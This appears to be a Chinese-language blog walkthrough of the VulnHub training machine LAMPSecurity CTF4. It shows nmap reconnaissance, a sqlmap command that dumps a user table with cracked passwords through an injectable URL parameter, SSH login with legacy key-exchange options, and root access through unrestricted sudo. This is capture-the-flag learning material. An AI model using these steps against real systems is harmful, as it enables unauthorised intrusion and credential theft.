打靶 LAMPSECURITY: CTF4

TryHardToKeep

已于 2023-03-14 09:47:25 修改

阅读量187

点赞数

分类专栏：打靶渗透测试文章标签：网络安全

于 2023-03-12 20:55:40 首次发布

本文链接：https://blog.csdn.net/Mysmycbx/article/details/129480609

版权

打靶同时被 2 个专栏收录

35 篇文章 0 订阅

订阅专栏

渗透测试

35 篇文章 0 订阅

订阅专栏

打靶 LAMPSECURITY: CTF4

https://www.vulnhub.com/entry/lampsecurity-ctf4,83/

扫描主机ip

nmap -sn 192.168.54.0/24

MAC Address: 00:50:56:E1:33:13 (VMware)
Nmap scan report for 192.168.54.137
Host is up (0.00022s latency).

扫描靶机

扫描开放端口

nmap --min-rate 10000  -p- 192.168.54.137                                                                                                    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 20:41 CST
Nmap scan report for 192.168.54.137
Host is up (0.0014s latency).
Not shown: 65512 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT    STATE  SERVICE
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds

扫描端口服务

┌──(root💀yunki)-[/home/yunki/vulnhub/ctf4]
└─# nmap -sT -sV -O -p22,25,80,631 192.168.54.137 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 20:44 CST
Nmap scan report for 192.168.54.137
Host is up (0.00082s latency).

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Device type: general purpose|remote management|terminal server|proxy server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (98%), Control4 embedded (96%), Lantronix embedded (96%), SonicWALL embedded (95%), SNR embedded (95%), Dell iDRAC 6 (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:lantronix:slc_8 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), Control4 HC-300 home controller (96%), Lantronix SLC 8 terminal server (Linux 2.6) (96%), SonicWALL Aventail EX-6000 VPN appliance (95%), SNR SNR-S2960 switch (95%), Linux 2.6.8 - 2.6.30 (94%), Linux 2.6.9 - 2.6.18 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds



┌──(root💀yunki)-[/home/yunki/vulnhub/ctf4]
└─# nmap -sU -p22,25,80,631 192.16.54.137                                                                                                          1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 20:46 CST
Nmap scan report for 192.16.54.137
Host is up (0.00079s latency).

PORT    STATE         SERVICE
22/udp  open|filtered ssh
25/udp  open|filtered smtp
80/udp  open|filtered http
631/udp open|filtered ipp

Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds

去看看80网页吧。
http://192.168.54.137/index.html?page=blog&title=Blog&id=2发现该网址可能出现sql注入，尝试一下。


┌──(root💀yunki)-[/home/yunki/vulnhub/ctf4]
└─# sqlmap -u "http://192.168.54.137/index.html?page=blog&title=Blog&id=2" --dbs --batch --dump
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

ssh登录

┌──(root💀yunki)-[/home/yunki/vulnhub/ctf4]
└─# ssh dstevens@192.168.54.137                                                                
Unable to negotiate with 192.168.54.137 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
                                                                                                                                                       
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf4]
└─# ssh dstevens@192.168.54.137 -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1        255 ⨯
The authenticity of host '192.168.54.137 (192.168.54.137)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.137' (RSA) to the list of known hosts.
BSD SSH 4.1
dstevens@192.168.54.137's password: 
Last login: Wed Mar 11 09:45:34 2009
[dstevens@ctf4 ~]$

成功拿到shell，

提权

[dstevens@ctf4 ~]$ sudo -l
User dstevens may run the following commands on this host:
    (ALL) ALL
[dstevens@ctf4 ~]$ sudo /bin/bash
[root@ctf4 ~]# whoami
root